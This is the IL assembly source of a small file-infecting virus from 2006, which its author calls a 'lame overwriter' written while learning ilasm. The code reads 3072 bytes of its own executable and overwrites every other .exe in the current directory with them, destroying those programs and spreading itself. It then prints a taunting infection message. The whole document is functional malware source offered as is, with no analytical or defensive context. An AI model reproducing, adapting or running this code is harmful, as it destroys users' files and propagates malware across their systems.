//.........................................................................
//  built under m$ .NET Framework IL Version 2.0.50727.42                 //
//  coded by bernie(fakedminded labs) under exteremly                     //
//  emotional down!!..                                                    // 
//  ps:praipism is characterised by painfule penile erection              //
//     without sexual arousal,its caused sometimes by diseases like       //
//     leukemia or it is just idiopathic.	                          //
//  the_virus:is lame overwriter coded    while learning ilasm.           //
//                       copy_write 2006                                  //
//........................................................................//



.assembly extern mscorlib{}
.assembly sample{}
.class private auto ansi beforefieldinit Sample
       extends [mscorlib]System.Object
{
  .method public hidebysig static 
          void  Main() cil managed
  { .entrypoint

    .locals(int32 list_exe,string cur_dir,string[] all_files,
	string state,string p_name,class [mscorlib]System.IO.FileStream own_file,
	uint8[] read_me,class [mscorlib]System.IO.BinaryReader read_file,
	class [mscorlib]System.IO.BinaryWriter write_file,int32 count_er,int32 size_now)

read_current:
	call class [System]System.Diagnostics.Process [System]			System.Diagnostics.Process::GetCurrentProcess()
	callvirt instance class [System]System.Diagnostics.ProcessModule [System]			System.Diagnostics.Process::get_MainModule()
	callvirt string [system]System.Diagnostics.ProcessModule::get_FileName()
	stloc p_name

	ldc.i4 3072
	stloc size_now
	ldloc size_now
	newarr [mscorlib]System.Byte
	stloc read_me
	ldloc p_name
	ldc.i4 4
	ldc.i4 1
	newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
	valuetype [mscorlib]System.IO.FileMode,valuetype [mscorlib]System.IO.FileAccess)
	stloc own_file
	ldloc own_file
	newobj instance void [mscorlib]System.IO.BinaryReader::.ctor(class 
	[mscorlib]System.IO.Stream)
	stloc read_file
	ldc.i4 0	
	stloc count_er
loop_read:	
	ldloc read_me
	ldloc count_er
	ldloc read_file
	callvirt instance uint8 [mscorlib]System.IO.BinaryReader::ReadByte()

	stelem.i1
	ldloc count_er
	ldc.i4 1
	add
	stloc count_er
	ldloc count_er
	ldloc size_now	
	blt loop_read


	
	ldc.i4 0
	stloc list_exe
	call string [mscorlib]System.IO.Directory::GetCurrentDirectory()
	stloc cur_dir
	
	ldloc cur_dir
	ldstr "*.exe"
	call string[] [mscorlib]System.IO.Directory::GetFiles(string,string)
	stloc all_files
list_1:	ldloc all_files
	ldloc list_exe
	ldelem.ref
	ldloc p_name
	call bool [mscorlib]System.String::op_Equality(string,string)
	brtrue next_one
	ldloc all_files
	ldloc list_exe
	ldelem.ref
infect:	
	ldc.i4 4
	ldc.i4 3
	newobj instance void [mscorlib]System.IO.FileStream::.ctor(string,
	valuetype [mscorlib]System.IO.FileMode,valuetype [mscorlib]System.IO.FileAccess)
	stloc own_file
	ldloc own_file
	newobj instance void [mscorlib]System.IO.BinaryWriter::.ctor(class [mscorlib]	System.IO.Stream)
	stloc write_file
	ldc.i4 0
	stloc count_er
	
	ldloc read_file	
	callvirt instance void [mscorlib]System.IO.BinaryReader::Close()


loop_write:ldloc write_file
	ldloc read_me
	ldloc count_er
	ldelem.u1
	callvirt instance void [mscorlib]System.IO.BinaryWriter::Write(uint8)
	ldloc count_er
	ldc.i4 1
	add
	stloc count_er
	ldloc count_er
	ldloc size_now
	blt loop_write
	
next_one:
	ldloc list_exe
	ldc.i4 1
	add
	stloc list_exe
	ldloc list_exe
	ldloc all_files
	ldlen 
	conv.i4
	blt list_1
	ldstr "error:file is been infected/corrupted by little boy suffering priapism!!"
	call void [mscorlib]System.Console::WriteLine(string)
exit:	ret
}
}
